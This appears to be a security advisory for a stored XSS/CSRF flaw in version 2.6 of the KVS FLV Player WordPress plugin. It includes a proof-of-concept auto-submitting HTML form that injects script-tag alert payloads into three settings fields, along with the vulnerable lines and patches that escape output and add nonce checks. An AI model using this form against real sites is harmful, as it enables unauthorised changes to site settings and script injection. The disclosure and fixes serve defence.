Wordpress KVS Player Stored XSS/CSRF

2015.09.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Wordpress KVS Player Stored XSS/CSRF
# Exploit Author: Ashiyane Digital security Team
# Vendor Homepage: https://wordpress.org/plugins/kvs-flv-player/
# Software Link: https://downloads.wordpress.org/plugin/kvs-flv-player.zip
# Version: 2.6
# Date: 2015-09-11
# Tested on: Windows 7 / Firefox
####################################################
# Exploit :

<form name="form1" method="POST" Action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=kvs-player">
<input type="hidden" name="width" value="854" />
<input type="hidden" name="height" value="480" />
<input type="hidden" name="hide_controlbar" value="1" />
<input type="hidden" name="hide_style" value="fade" />
<input type="hidden" name="preview_url" value='"><script>alert("xss1")</script>' />
<input type="hidden" name="embed" value="" />
<input type="hidden" name="sec" value='"><script>alert("xss 2")</script>' />
<input type="hidden" name="bt" value='"><script>alert("xss 3")</script>' />
<input type="hidden" name="save_changes" value="Save Changes" />
</form>
<script language="javascript">
setTimeout('form1.submit()', 1);
</script>

####################################################################
# Vulnerable File : /wp-content/plugins/kvs-flv-player/kvs-flv-player.php
# Vulnerable code:

line 136 :
<input type="text" id="preview_url" name="preview_url" value="<?php echo $kvs_player_options['preview_url']; ?>" size="40"/>

line 194 :
<input type="text" id="sec" name="sec" value="<?php echo $kvs_player_options['sec']; ?>" size="10"/>

line 203 :
<input type="text" id="bt" name="bt" value="<?php echo $kvs_player_options['bt']; ?>" size="10"/>

===============================================
# For patch: Replace Lines :

line 136 :
<input type="text" id="preview_url" name="preview_url" value="<?php echo htmlspecialchars($kvs_player_options['preview_url']); ?>" size="40"/>

line 194 :
<input type="text" id="sec" name="sec" value="<?php echo htmlspecialchars($kvs_player_options['sec']); ?>" size="10"/>

line 203 :
<input type="text" id="bt" name="bt" value="<?php echo htmlspecialchars($kvs_player_options['bt']); ?>" size="10"/>

##########################################################
Discovered by : Amir.ght(Goldhack)
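The patch above escapes the three values on output; the auto-submitting form carries no token, so the settings request also needs an origin check. An added example (not the plugin's or the author's code) of a settings handler and form using WordPress's nonce, sanitising and escaping functions; the option name, nonce action and field, and function names are hypothetical.

```php
<?php
// Added example, not the plugin's code; runs inside WordPress admin.
// Hypothetical names: option 'kvs_player_options', nonce action 'kvs_player_save',
// nonce field 'kvs_player_nonce', and both function names.

function kvs_example_save_settings() {
    if ( ! isset( $_POST['save_changes'] ) ) {
        return;
    }
    // CSRF check: aborts unless the POST carries a nonce issued to this user.
    check_admin_referer( 'kvs_player_save', 'kvs_player_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change these settings.' );
    }
    $in  = wp_unslash( $_POST );
    // Accept only scalar strings; array-valued parameters become ''.
    $str = function ( $key ) use ( $in ) {
        return is_string( $in[ $key ] ?? null ) ? $in[ $key ] : '';
    };
    $options = (array) get_option( 'kvs_player_options', array() );
    // Sanitise on input: the URL field keeps only a URL, text fields lose tags.
    $options['preview_url'] = esc_url_raw( $str( 'preview_url' ) );
    $options['sec']         = sanitize_text_field( $str( 'sec' ) );
    $options['bt']          = sanitize_text_field( $str( 'bt' ) );
    update_option( 'kvs_player_options', $options );
}
add_action( 'admin_init', 'kvs_example_save_settings' );

function kvs_example_render_fields() {
    $o = (array) get_option( 'kvs_player_options', array() );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'kvs_player_save', 'kvs_player_nonce' ); ?>
        <!-- Escape on output as well, so values stored before the fix stay inert. -->
        <input type="text" id="preview_url" name="preview_url"
               value="<?php echo esc_url( $o['preview_url'] ?? '' ); ?>" size="40"/>
        <input type="text" id="sec" name="sec"
               value="<?php echo esc_attr( $o['sec'] ?? '' ); ?>" size="10"/>
        <input type="text" id="bt" name="bt"
               value="<?php echo esc_attr( $o['bt'] ?? '' ); ?>" size="10"/>
        <input type="submit" name="save_changes" value="Save Changes"/>
    </form>
    <?php
}
```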

References:

https://wordpress.org/plugins/kvs-flv-player/

